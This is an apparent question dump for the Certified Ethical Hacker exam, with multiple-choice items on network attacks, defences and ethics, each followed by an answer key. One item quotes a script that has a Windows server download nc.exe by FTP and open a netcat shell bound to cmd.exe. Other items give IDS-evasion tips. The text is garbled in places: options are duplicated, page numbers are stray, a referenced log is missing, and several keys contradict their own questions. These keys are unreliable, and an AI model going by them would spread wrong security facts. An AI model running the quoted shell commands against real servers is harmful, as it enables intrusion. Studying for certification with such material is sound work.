249 A remote user tries to login to a secure network using Telnet, but accidently types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer) 150 A. Invalid Username B. Invalid Password C. Authentication Failure D. Login Attempt Failed E. Access Denied

A,B (Explanation: As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable.)

464 What makes web application vulnerabilities so aggravating? (Choose two) A. They can be launched through an authorized port. B. A firewall will not stop them. C. They exist only on the Linux platform. D. They are detectable by most leading antivirus software.

A,B (Explanation: As the vulnerabilities exists on a web server, incoming traffic on port 80 will probably be allowed and no firewall rules will stop the attack.)

518 John runs a Web Server, IDS and firewall on his network. Recently his Web Server has been under constant hacking attacks. He looks up the IDS log files and sees no Intrusion attempts but the web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John become suspicious and views he firewall logs and he notices huge SSL connections constantly hitting web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the web server and that was the reason the IDS did not detect the intrusions. How would Jon protect his network form these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. Install a hardware SSL "accelerator" and terminate SSL at this layer C. Enable the IDS to filter encrypted HTTPS traffic D. Enable the firewall to filter encrypted HTTPS traffic

A,B (Explanation: By terminating the SSL connection at a proxy or a SSL accelerator and then use clear text the distance between the proxy/accelerator and the server, you make it possible for the IDS to scan the traffic. Topic 20, Buffer Overflows)

270 The network administrator at Spears Technology, Inc has configured the default gateway Cisco Router's access-list as below: You are tried to conduct security testing on their network. You successfully brute-force for SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. 163 You want to retrieve the Cisco Configuration from the router. How would you proceed? A. Send a customized SNMP set request with spoofed source IP Address in the range- 192.168.1.0 B. Run a network sniffer and capture the returned traffic with the configuration file from the router C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address D. Use the Cisco's TFTP default password to connect and download the configuration file

A,B (Explanation: SNMP is allowed only by access-list 1. Therefore you need to spoof a 192.168.1.0/24 address and then sniff the reply from the gateway.)

269 How do you defend against ARP spoofing? A. Place static ARP entries on servers, workstation and routers B. True IDS Sensors to look for large amount of ARP traffic on local subnets 162 C. Use private VLANS D. Use ARPWALL system and block ARP spoofing attacks

A,B,C (Explanation: ARPWALL is a opensource tools will give early warning when arp attack occurs. This tool is still under construction.)

336 Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three) A. Internet Printing Protocol (IPP) buffer overflow B. Code Red Worm C. Indexing services ISAPI extension buffer overflow D. NeXT buffer overflow

A,B,C (Explanation: Both the buffer overflow in the Internet Printing Protocol and the ISAPI extension buffer overflow is explained in Microsoft Security Bulletin MS01-023. The Code Red worm was a computer worm released on the Internet on July 13, 2001. It attacked computers running Microsoft's IIS web server.)

531 Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? A. strcpy() B. strcat() C. streadd() D. strscock()

A,B,C (Explanation: When hunting buffer overflows, the first thing to look for is functions which write into arrays without any way to know the amount of space available. If you get to define the function, you can pass a length parameter in, or ensure that every array you ever pass to it is at least as big as the hard-coded maximum amount it will write. If you're using a function someone else (like, say, the compiler vendor) has provided then avoiding functions like gets(), which take some amount of data over which you have no control and stuff it into arrays they can never know the size of, is a good start. Make sure that functions like the str...() family which expect NUL-terminated strings actually get them - store a '\0' in the last element of each array involved just before you call the function, if necessary. Strscock() is not a valid C/C++ function.)

298 The SYN Flood attack sends TCP connections requests faster than a machine can process them. Attacker creates a random source address for each packet. SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP Address Victim responds to spoofed IP Address then waits for confirmation that never arrives (timeout wait is about 3 minutes) Victim's connection table fills up waiting for replies and ignores new connection legitimate users are ignored and will not be able to access the server How do you protect your network against SYN Flood attacks? A. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP Address port number and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus the server first allocates memory on the third packet of the handshake, not the first. B. RST cookies - The server sends a wrong SYN|ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally. C. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16- bytes for the incoming SYN object. D. Stack Tweaking. TCP can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection.

A,B,C,D (Explanation: All above helps protecting against SYN flood attacks. Most TCP/IP stacks today are already tweaked to make it harder to perform a SYN flood DOS attack against a target. 179)

5 Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply) A. CHAT rooms B. WHOIS database C. News groups D. Web sites E. Search engines F. Organization's own web site

A,B,C,D,E,F (Explanation: A Security tester should search for information everywhere that he/she can access. You never know where you find that small piece of information that could penetrate a strong defense.)

611 How do you defend against Privilege Escalation? 369 A. Use encryption to protect sensitive data B. Restrict the interactive logon privileges C. Run services as unprivileged accounts D. Allow security settings of IE to zero or Low E. Run users and applications on the least privileges

A,B,C,E

35 Doug is conducting a port scan of a target network. He knows that his client target network has a web server and that there is a mail server also which is up and running. Doug has been sweeping the network but has not been able to elicit any response from the remote target. Which of the following could be the most likely cause behind this lack of response? Select 4. A. UDP is filtered by a gateway B. The packet TTL value is too low and cannot reach the target C. The host might be down D. The destination network might be down E. The TCP windows size does not match F. ICMP is filtered by a gateway

A,B,C,F (Explanation: If the destination host or the destination network is down there is no way to get an answer and if TTL (Time To Live) is set too low the UDP packets will "die" before reaching the host because of too many hops between the scanning computer and the target. The TCP receive window size is the amount of received data (in bytes) that can be buffered during a connection. The sending host can send only that amount of data before it must wait for an acknowledgment and window update from the receiving host and ICMP is mainly used for echo requests and not in port scans.)

208 Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack? 123 A. Timestamps B. SMB Signing C. File permissions D. Sequence numbers monitoring

A,B,D

319 Which of these are phases of a reverse social engineering attack? Select the best answers. A. Sabotage B. Assisting C. Deceiving D. Advertising E. Manipulating

A,B,D (Explanation: Explanations: According to "Methods of Hacking: Social Engineering", by Rick Nelson, the three phases of reverse social engineering attacks are sabotage, advertising, and assisting.)

171 A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers. A. Use port security on his switches. B. Use a tool like ARPwatch to monitor for strange ARP activity. C. Use a firewall between all LAN segments. D. If you have a small network, use static ARP entries. E. Use only static IP addresses on all PC's.

A,B,D (Explanation: Explanations: By using port security on his switches, the switches will only allow the first MAC address that is connected to the switch to use that port, thus preventing ARP spoofing. ARPWatch is a tool that monitors for strange ARP activity. This may help identify ARP spoofing when it happens. Using firewalls between all LAN segments is possible and may help, but is usually pretty unrealistic. On a very small network, static ARP entries are a possibility. However, on a large network, this is not an realistic option. ARP spoofing doesn't have anything to do with static or dynamic IP addresses. Thus, this option won't help you.)

172 Peter, a Network Administrator, has come to you looking for advice on a tool that would 103 help him perform SNMP enquires over the network. Which of these tools would do the SNMP enumeration he is looking for? Select the best answers. A. SNMPUtil B. SNScan C. SNMPScan D. Solarwinds IP Network Browser E. NMap

A,B,D (Explanation: Explanations: SNMPUtil is a SNMP enumeration utility that is a part of the Windows 2000 resource kit. With SNMPUtil, you can retrieve all sort of valuable information through SNMP. SNScan is a SNMP network scanner by Foundstone. It does SNMP scanning to find open SNMP ports. Solarwinds IP Network Browser is a SNMP enumeration tool with a graphical tree-view of the remote machine's SNMP data.)

198 Windows LAN Manager (LM) hashes are known to be weak. Which of the following are known weaknesses of LM? (Choose three) A. Converts passwords to uppercase. B. Hashes are sent in clear text over the network. C. Makes use of only 32 bit encryption. D. Effective length is 7 characters.

A,B,D (Explanation: The LM hash is computed as follows.1. The user's password as an OEM string is converted to uppercase. 2. This password is either null-padded or truncated to 14 bytes. 3. The "fixed-length" password is split into two 7-byte halves. 4. These values are used to create two DES keys, one from each 7-byte half. 5. Each of these keys is used to DES-encrypt the constant ASCII string "KGS!@#$%", resulting in two 8-byte ciphertext values. 6. These two ciphertext values are concatenated to form a 16-byte value, which is the LM hash. The hashes them self are sent in clear text over the network instead of sending the password in clear text. 118)

673 What techniques would you use to evade IDS during a Port Scan? (Select 4 answers) A. Use fragmented IP packets B. Spoof your IP address when launching attacks and sniff responses from the server C. Overload the IDS with Junk traffic to mask your scan D. Use source routing (if possible) E. Connect to proxy servers or compromised Trojaned machines to launch attacks

A,B,D,E

615 371 What are the limitations of Vulnerability scanners? (Select 2 answers) A. There are often better at detecting well-known vulnerabilities than more esoteric ones B. The scanning speed of their scanners are extremely high C. It is impossible for any, one scanning product to incorporate all known vulnerabilities in a timely manner D. The more vulnerabilities detected, the more tests required E. They are highly expensive and require per host scan license

A,C

471 Bob, an Administrator at company was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, including administrative tasks suck as configuring routers, firewalls, IDS, via Telnet. Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in company. Based on the above scenario, please choose which would be your corrective measurement actions (Choose two) A. Use encrypted protocols, like those found in the OpenSSH suite. B. Implement FAT32 filesystem for faster indexing and improved performance. C. Configure the appropriate spoof rules on gateways (internal and external). D. Monitor for CRP caches, by using IDS products.

A,C (Explanation: First you should encrypt the data passed between the parties; in particular the session key. This technique is widely relied-upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack. By configuring the appropriate spoof rules you prevent the attacker from using the same IP address as the victim as thus you can implement secondary check to see that the IP does not change in the middle of the session.)

525 Buffer X is an Accounting application module for company can contain 200 characters. The 319 programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted. Dave decided to insert 400 characters into the 200-character buffer which overflows the buffer. Below is the code snippet: Void func (void) {int I; char buffer [200]; for (I=0; I<400; I++) buffer (I)= 'A'; return; } How can you protect/fix the problem of your application as shown above? (Choose two) A. Because the counter starts with 0, we would stop when the counter is less then 200. B. Because the counter starts with 0, we would stop when the counter is more than 200. C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data. D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data.

A,C (Explanation: I=199 would be the character number 200. The stack holds exact 200 characters so there is no need to stop before 200.)

534 Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet. How can you protect/fix the problem of your application as shown above? A. Because the counter starts with 0, we would stop when the counter is less than 200 B. Because the counter starts with 0, we would stop when the counter is more than 200 C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it can't hold any more data D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it can't hold any more data

A,C (Explanation: I=199 would be the character number 200. The stack holds exact 200 characters so there is no need to stop before 200.)

80 Name two software tools used for OS guessing.(Choose two. A. Nmap B. Snadboy C. Queso D. UserInfo E. NetBus

A,C (Explanation: Nmap and Queso are the two best-known OS guessing programs. OS guessing software has the ability to look at peculiarities in the way that each vendor implements the RFC's. These differences are compared with its database of known OS fingerprints. Then a best guess of the OS is provided to the user.)

749 How do you defend against ARP Poisoning attack? (Select 2 answers) A. Enable DHCP Snooping Binding Table B. Restrict ARP Duplicates C. Enable Dynamic ARP Inspection D. Enable MAC snooping Table

A,C ( Enable DHCP Snooping Binding Table. Enable Dynamic ARP Inspection)

735 The SNMP Read-Only Community String is like a password. The string is sent along with each SNMP Get-Request and allows (or denies) access to a device. Most network vendors ship their equipment with a default password of "public". This is the so-called "default public community string". How would you keep intruders from getting sensitive information regarding the network devices using SNMP? (Select 2 answers) A. Enable SNMPv3 which encrypts username/password authentication B. Use your company name as the public community string replacing the default 'public' C. Enable IP filtering to limit access to SNMP device D. The default configuration provided by device vendors is highly secure and you don't need to change anything

A,C)

403 Which of the following wireless technologies can be detected by NetStumbler? (Select all that apply) A. 802.11b B. 802.11e C. 802.11a D. 802.11g E. 802.11

A,C,D (Explanation: If you check the website, cards for all three (A, B, G) are supported. See: http://www.stumbler.net/ 242)

582 An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: (Select up to 3) A. Invalid community string B. S-AUTH protocol is running on the SNMP server C. Machine unreachable D. SNMP server not running

A,C,D (Explanation: http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol)

431 Which are true statements concerning the BugBear and Pretty Park worms? Select the best answers. A. Both programs use email to do their work. B. Pretty Park propagates via network shares and email C. BugBear propagates via network shares and email D. Pretty Park tries to connect to an IRC server to send your personal passwords. E. Pretty Park can terminate anti-virus applications that might be running to bypass them.

A,C,D (Explanation: Explanations: Both Pretty Park and BugBear use email to spread. Pretty Park cannot propagate via network shares, only email. BugBear propagates via network shares and email. It also terminates anti-virus applications and acts as a backdoor server for someone to get into the infected machine. Pretty Park tries to connect to an IRC server to send your personal passwords and all sorts of other information it retrieves from your PC. Pretty Park cannot terminate anti-virus applications. However, BugBear can terminate AV software so that it can bypass them. Topic 17, Physical Security)

443 Several of your co-workers are having a discussion over the etc/passwd file. They are at odds over what types of encryption are used to secure Linux passwords.(Choose all that apply. A. Linux passwords can be encrypted with MD5 B. Linux passwords can be encrypted with SHA C. Linux passwords can be encrypted with DES D. Linux passwords can be encrypted with Blowfish E. Linux passwords are encrypted with asymmetric algrothims

A,C,D (Explanation: Linux passwords are enrcypted using MD5, DES, and the NEW addition Blowfish. The default on most linux systems is dependant on the distribution, RedHat uses MD5, while slackware uses DES. The blowfish option is there for those who wish to use it. The encryption algorithm in use can be determined by authconfig on RedHat-based systems, or by reviewing one of two locations, on PAM-based systems (Pluggable Authentication Module) it can be found in /etc/pam.d/, the system-auth file or authconfig files. In other systems it can be found in /etc/security/ directory.)

508 There are two types of honeypots- high and low interaction. Which of these describes a low interaction honeypot? 308 Select the best answers. A. Emulators of vulnerable programs B. More likely to be penetrated C. Easier to deploy and maintain D. Tend to be used for production E. More detectable F. Tend to be used for research

A,C,D,E (Explanation: Explanations: A low interaction honeypot would have emulators of vulnerable programs, not the real programs. A high interaction honeypot is more likely to be penetrated as it is running the real program and is more vulnerable than an emulator. Low interaction honeypots are easier to deploy and maintain. Usually you would just use a program that is already available for download and install it. Hackers don't usually crash or destroy these types of programs and it would require little maintenance. A low interaction honeypot tends to be used for production. Low interaction honeypots are more detectable because you are using emulators of the real programs. Many hackers will see this and realize that they are in a honeypot. A low interaction honeypot tends to be used for production. A high interaction honeypot tends to be used for research.)

141 Which of the following tools can be used to perform a zone transfer? A. NSLookup B. Finger C. Dig D. Sam Spade E. Host F. Netcat G. Neotrace

A,C,D,E (Explanation: There are a number of tools that can be used to perform a zone transfer. Some of these include: NSLookup, Host, Dig, and Sam Spade.)

745 Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. How will you defend against hardware keyloggers when using public computers and Internet Kiosks? (Select 4 answers) A. Alternate between typing the login credentials and typing characters somewhere else in the focus window B. Type a wrong password first, later type the correct password on the login page defeating the keylogger recording C. Type a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter. D. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd". Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies "asdfsd" E. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd". Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies "asdfsd"

A,C,D,E)

565 You just purchased the latest DELL computer, which comes pre-installed with Windows XP, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. A. New Installation of Windows Should be patched by installation the latest service packs and hotfixes B. Enable "guest" account C. Install a personal firewall and lock down unused ports from connecting to your computer D. Install the latest signatures for Antivirus software E. Configure "Windows Update" to automatic F. Create a non-admin user with a complex password and login to this account

A,C,D,E,F (Explanation: The guest account is a possible vulnerability to your system so you should not enable it unless needed. Otherwise you should perform all other actions mentioned in order to have a secure system. Topic 23, Mixed Questions)

723 In which step Steganography fits in CEH System Hacking Cycle (SHC) A. Step 2: Crack the password B. Step 1: Enumerate users C. Step 3: Escalate privileges D. Step 4: Execute applications E. Step 5: Hide files F. Step 6: Cover your tracks

A,C,D,E,F)

107 What are the four steps is used by nmap scanning? A. DNS Lookup B. ICMP Message C. Ping D. Reverse DNS lookup E. TCP three way handshake F. The Actual nmap scan

A,C,D,F (Explanation: Nmap performs four steps during a normal device scan. Some of these steps can be modified or disabled using options on the nmap command line.)

657 BankerFox is a Trojan that is designed to steal users' banking data related to certain banking entities. When they access any website of the affected banks through the vulnerable Firefox 3.5 browser, the Trojan is activated and logs the information entered by the user. All the information entered in that website will be logged by the Trojan and transmitted to the attacker's machine using covert channel. BankerFox does not spread automatically using its own means. It needs an attacking user's intervention in order to reach the affected computer. 397 What is the most efficient way an attacker located in remote location to infect this banking Trojan on a victim's machine? A. Physical access - the attacker can simply copy a Trojan horse to a victim's hard disk infecting the machine via Firefox add-on extensions B. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer C. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer D. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer E. Downloading software from a website? An attacker can offer free software, such as shareware programs and pirated mp3 files

E

217 One of your junior administrator is concerned with Windows LM hashes and password cracking. In your discussion with them, which of the following are true statements that you would point out? Select the best answers. A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show if the password is upper or lower case. B. BY using NTLMV1, you have implemented an effective countermeasure to password cracking. C. SYSKEY is an effective countermeasure. D. If a Windows LM password is 7 characters or less, the hash will be passed with the following characters, in HEX- 00112233445566778899. E. Enforcing Windows complex passwords is an effective countermeasure.

A,C,E (Explanation: Explanations: John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show if the password is upper or lower case. John the Ripper is a very effective password cracker. It can crack passwords for many different types of operating systems. However, one limitation is that the output doesn't show if the password is upper or lower case. BY using NTLMV1, you have implemented an effective countermeasure to password cracking. NTLM Version 2 (NTLMV2) is a good countermeasure to LM password cracking (and therefore a correct answer). To do this, set Windows 9x and NT systems to "send NTLMv2 responses only". SYSKEY is an effective countermeasure. It uses 128 bit encryption on the local copy of the Windows SAM. If a Windows LM password is 7 characters or less, the has will be passed with the following characters: 0xAAD3B435B51404EE Enforcing Windows complex passwords is an effective countermeasure to password cracking. Complex passwords are- greater than 6 characters and have any 3 of the following 4 items: upper case, lower case, special characters, and numbers.)

146 86 Which of the following statements about a zone transfer correct?(Choose three. A. A zone transfer is accomplished with the DNS B. A zone transfer is accomplished with the nslookup service C. A zone transfer passes all zone information that a DNS server maintains D. A zone transfer passes all zone information that a nslookup server maintains E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections F. Zone transfers cannot occur on the Internet

A,C,E (Explanation: Securing DNS servers should be a priority of the organization. Hackers obtaining DNS information can discover a wealth of information about an organization. This information can be used to further exploit the network.)

667 Which of the following is NOT part of CEH Scanning Methodology? A. Check for Live systems B. Check for Open Ports C. Banner Grabbing D. Prepare Proxies E. Social Engineering attacks F. Scan for Vulnerabilities G. Draw Network Diagrams

E

119 Jack is conducting a port scan of a target network. He knows that his target network has a web server and that a mail server is up and running. Jack has been sweeping the network but has not been able to get any responses from the remote target. Check all of the following that could be a likely cause of the lack of response? A. The host might be down B. UDP is filtered by a gateway C. ICMP is filtered by a gateway D. The TCP window Size does not match E. The destination network might be down F. The packet TTL value is too low and can't reach the target

A,C,E,F (Explanation: Wrong answers is B and D as sweeping a network uses ICMP 70)

409 Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob have to take in order to successfully implement this? (Select 2 answer.) A. Train users in the new policy. B. Disable all wireless protocols at the firewall. C. Disable SNMP on the network so that wireless devices cannot be configured. D. Continuously survey the area for wireless devices.

A,D (Explanation: If someone installs a access point and connect it to the network there is no way to find it unless you are constantly surveying the area for wireless devices. SNMP and firewalls can not prevent the installation of wireless devices on the corporate network. 245)

173 SNMP is a protocol used to query hosts, servers and devices about performance or health status data. Hackers have used this protocol for a long time to gather great amount of information about remote hosts. Which of the following features makes this possible? A. It is susceptible to sniffing B. It uses TCP as the underlying protocol C. It is used by ALL devices on the market D. It uses a community string sent as clear text

A,D (Explanation: SNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use it and it can be disabled on most of the devices that does use it. However SNMP is susceptible to sniffing and the community string (which can be said acts as a password) is sent in clear text. 104)

195 Which of the following are well know password-cracking programs?(Choose all that apply. 116 A. L0phtcrack B. NetCat C. Jack the Ripper D. Netbus E. John the Ripper

A,E (Explanation: L0phtcrack and John the Ripper are two well know password-cracking programs. Netcat is considered the Swiss-army knife of hacking tools, but is not used for password cracking)

108 A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions: system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); system("perl msadc.pl -h $host -C \"echo $user>>testfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>testfile\""); system("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\""); ("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); Which exploit is indicated by this script? A. A buffer overflow exploit B. A chained exploit C. A SQL injection exploit D. A denial of service exploit

B

111 Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? A. NMAP -PN -A -O -sS 192.168.2.0/24 B. NMAP -P0 -A -O -p1-65535 192.168.0/24 C. NMAP -P0 -A -sT -p0-65535 192.168.0/16 D. NMAP -PN -O -sS -p 1-1024 192.168.0/8

B

112 While checking the settings on the internet browser, a technician finds that the proxy server settings have been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet does the technician see? A. 10.10.10.10 B. 127.0.0.1 C. 192.168.1.1 D. 192.168.168.168

B

114 A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique should the tester consider using? A. Spoofing an IP address B. Tunneling scan over SSH C. Tunneling over high port numbers D. Scanning using fragmented IP packets

B

127 What is the outcome of the comm"nc -l -p 2222 | nc 10.1.0.43 1234"? A. Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222. B. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234. C. Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222. D. Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.

B

130 A tester has been hired to do a web application security test. The tester notices that the site is dynamic and must make use of a back end database. In order for the tester to see if SQL injection is possible, what is the first character that the tester should use to attempt breaking a valid SQL request? A. Semicolon B. Single quote C. Exclamation mark D. Double quote

B

133 Which of the following programming languages is most vulnerable to buffer overflow attacks? A. Perl B. C++ C. Python D. Java

B

145 A security administrator notices that the log file of the company's webserver contains suspicious entries: Based on source code analysis, the analyst concludes that the login.php script is vulnerable to A. command injection. B. SQL injection. C. directory traversal. D. LDAP injection.

B

146 Which solution can be used to emulate computer services, such as mail and ftp, and to capture information related to logins or actions? A. Firewall B. Honeypot C. Core server D. Layer 4 switch

B

152 A hacker, who posed as a heating and air conditioning specialist, was able to install a sniffer program in a switched environment network. Which attack could the hacker use to sniff all of the packets in the network? A. Fraggle B. MAC Flood C. Smurf D. Tear Drop

B

156 An attacker has been successfully modifying the purchase price of items purchased on the company's web site. The security administrators verify the web server and Oracle database have not been compromised directly. They have also verified the Intrusion Detection System (IDS) logs and found no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the purchase price? A. By using SQL injection B. By changing hidden form values C. By using cross site scripting D. By utilizing a buffer overflow attack

B

164 What are the three types of authentication? A. Something you: know, remember, prove B. Something you: have, know, are C. Something you: show, prove, are D. Something you: show, have, prove

B

175 A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of email. The integrity of the encrypted email is dependent on the security of which of the following? A. Public key B. Private key C. Modulus length D. Email server certificate

B

178 Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations? A. Certificate issuance B. Certificate validation C. Certificate cryptography D. Certificate revocation

B

19 Which of the following is a component of a risk assessment? A. Physical security B. Administrative safeguards C. 12 DMZ D. Logical interface

B

192 The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services? A. An extensible security framework named COBIT B. A list of flaws and how to fix them C. Web application patches D. A security certification for hardened web applications

B

197 Company A and Company B have just merged and each has its own Public Key Infrastructure (PKI). What must the Certificate Authorities (CAs) establish so that the private PKIs for Company A and Company B trust one another and each private PKI can validate digital certificates from the other company? A. Poly key exchange B. Cross certification C. Poly key reference D. Cross-site exchange

B

20 When utilizing technical assessment methods to assess the security posture of a network, which of the following techniques would be most effective in determining whether end-user security training would be beneficial? A. Vulnerability scanning B. Social engineering C. Application security testing D. Network sniffing

B

201 Which of the following is a characteristic of Public Key Infrastructure (PKI)? A. Public-key cryptosystems are faster than symmetric-key cryptosystems. B. Public-key cryptosystems distribute public-keys within digital signatures. C. Public-key cryptosystems do not require a secure key distribution channel. D. Public-key cryptosystems do not provide technical non-repudiation via digital signatures.

B

210 Which Open Web Application Security Project (OWASP) implements a web application full of known vulnerabilities? A. WebBugs B. WebGoat C. VULN_HTML D. WebScarab

B

212 Which of the following algorithms provides better protection against brute force attacks by using a 160-bit message digest? A. MD5 B. SHA-1 C. RC4 D. MD4

B

227 An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job? A. Start by foot printing the network and mapping out a plan of attack. B. Ask the employer for authorization to perform the work outside the company. C. Begin the reconnaissance phase with passive information gathering and then move into active information gathering. D. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack.

B

228 A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take? A. Threaten to publish the penetration test results if not paid B. Follow proper legal procedures against the company to request payment. C. Tell other customers of the financial problems with payments from this company. D. Exploit some of the vulnerabilities found on the company webserver to deface it.

B

230 A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization? A. Say nothing and continue with the security testing. B. Stop work immediately and contact the authorities. C. Delete the pornography, say nothing, and continue security testing. D. Bring the discovery to the financial organization's human resource department.

B

26 A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much information can be obtained from the firm's public facing web servers. The engineer decides to start by using netcat to port 80. The engineer receives this output: HTTP/1.1 200 OK Server: Microsoft-IIS/6 Expires: Tue, 17 Jan 2011 01:41:33 GMT Date: Mon, 16 Jan 2011 01:41:33 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 28 Dec 2010 15:32:21 GMT ETag: "b0aac0542e25c31:89d" Content-Length: 7369 Which of the following is an example of what the engineer performed? A. Cross-site scripting B. Banner grabbing C. SQL injection D. Whois database query

B

29 Which results will be returned with the following Google search query? site:target.com -site:Marketing.target.com accounting A. Results matching all words in the query B. Results matching "accounting" in domain target.com but not on the site Marketing.target.com C. Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting D. Results for matches on target.com and Marketing.target.com that include the word "accounting"

B

30 A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature? A. Perform a vulnerability scan of the system. B. Determine the impact of enabling the audit feature C. Perform a cost/benefit analysis of the audit feature D. Allocate funds for staffing of audit log review.

B

358 Craig received a report of all the computers on the network that showed all the missing patches and weak passwords. What type of software generated this report? A. a port scanner B. a vulnerability scanner C. a virus scanner D. a malware scanner

B

364 The company ABC recently contracted a new accountant. The accountant will be working with the financial statements. Those financial statements need to be approved by the CFO and then they will be sent to the accountant but the CFO is worried because he wants to be sure that the information sent to the accountant was not modified once he approved it. What of the following options can be useful to ensure the integrity of the data? A. The document can be sent to the accountant using an exclusive USB for that document. B. The CFO can use a hash algorithm in the document once he approved the financial statements. C. The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure it is the same document. D. The CFO can use an excel file with a password.

B

